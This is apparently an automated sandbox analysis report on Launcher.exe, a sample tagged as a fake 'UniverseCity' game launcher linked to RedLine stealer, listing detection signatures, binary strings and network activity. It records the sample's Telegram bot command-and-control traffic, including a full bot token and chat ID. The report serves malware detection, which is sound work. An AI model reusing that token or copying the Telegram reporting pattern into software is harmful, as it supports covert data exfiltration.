Windows Analysis Report
Launcher.exe

Overview

General Information

Sample Name: Launcher.exe
Analysis ID: 753414
MD5: ac30d9ee77f4a6e23dea621727579dc5
SHA1: 9dc851e691a4af49882138ee7c5bac1dc126becd
SHA256: d8f1870f30298302fce860d7c56257f6a11e4689642c3d5367d2392db5356bed
Tags: 185-206-213-32CosmicWayexeFakeGaliXCityRedLineStealerUniverseCity
Infos:

Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges

Classification

AV Detection

barindex
Source: Launcher.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe

Networking

barindex
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected: GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Launcher.exe, 00000000.00000002.505090337.0000000002C24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: Launcher.exe, 00000000.00000002.508132544.0000000005AE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.506057740.0000000002E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://defaultcontainer/UniverseCity;component/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/Images/img_downloadWhite.png
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/fonts/dosis.ttf
Source: Launcher.exe, 00000000.00000002.505158901.0000000002C45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/fonts/montserrat-variablefont_wght.ttf
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foo/bar/images/img_downloadwhite.png
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Launcher.exe, 00000000.00000003.245277692.0000000005A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.508004314.00000000059FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://scripts.sil.org/OFL
Source: Launcher.exe String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLDosisExtraLightWeightLightMediumSemiBoldBoldExtr
Source: Launcher.exe String found in binary or memory: http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLMontserratThinMontserratRomanWeightExtraLightLig
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.impallari.com
Source: Launcher.exe String found in binary or memory: http://www.impallari.comThis
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zkysky.com.ar/
Source: Launcher.exe String found in binary or memory: http://www.zkysky.com.ar/This
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
Source: Launcher.exe, 00000000.00000002.505046797.0000000002C16000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Launcher.exe String found in binary or memory: https://api.telegram.org/bot
Source: Launcher.exe, 00000000.00000002.504845482.0000000002B94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage
Source: Launcher.exe, 00000000.00000002.504730568.0000000002B26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discord.com/invite/universecity
Source: Launcher.exe String found in binary or memory: https://discord.com/invite/universecityGhttps://twitter.com/UniverseCityP2E3https://universe-city.io
Source: Launcher.exe, 00000000.00000002.509592350.0000000009CA2000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245316162.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245301155.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.245327352.0000000005A3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/JulietaUla/Montserrat)
Source: Launcher.exe String found in binary or memory: https://github.com/JulietaUla/Montserrat)Montserrat
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/UniverseCityP2E
Source: Launcher.exe, 00000000.00000002.504547372.0000000002A81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://universe-city.io/
Source: Launcher.exe String found in binary or memory: https://universe-city.io/download/UniverseCity.zip
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: global traffic HTTP traffic detected: GET /bot5802716616:AAH_P81FtM2pxxnBzX9bl8iFQfHnI4qwKEs/sendMessage?chat_id=-1001729137879&text=5.0%20NEW%2020.11.2022%0A%E2%9C%85%D0%A3%D1%81%D0%BF%D0%B5%D1%88%D0%BD%D1%8B%D0%B9%20%D0%B7%D0%B0%D0%BF%D1%83%D1%81%D0%BA%20%D0%BB%D0%B0%D1%83%D0%BD%D1%87%D0%B5%D1%80%D0%B0:%20user%0A%D0%A1%D0%B0%D0%B9%D1%82:%20universecity%0A%D0%94%D0%B0%D1%82%D0%B0%2011/24/2022%207:35:59%20PM&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: Launcher.exe, 00000000.00000000.239074629.0000000000706000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe Binary or memory string: OriginalFilenameUniverseCity.exe4 vs Launcher.exe
Source: Launcher.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Launcher.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Launcher.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Launcher.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal48.troj.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\Launcher.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Launcher.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Launcher.exe Static file information: File size 1126912 > 1048576
Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Launcher.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Launcher.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb source: Launcher.exe
Source: Binary string: C:\Users\Dima\Desktop\Ogooo\CosmicWay\obj\Release\UniverseCity.pdb+G source: Launcher.exe
Source: Launcher.exe Static PE information: 0xAAC8B1A6 [Sun Oct 17 22:56:38 2060 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.109491085129885
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Window / User API: threadDelayed 1859 Jump to behavior
Source: Launcher.exe, 00000000.00000002.508111341.0000000005AD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Launcher.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Launcher.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior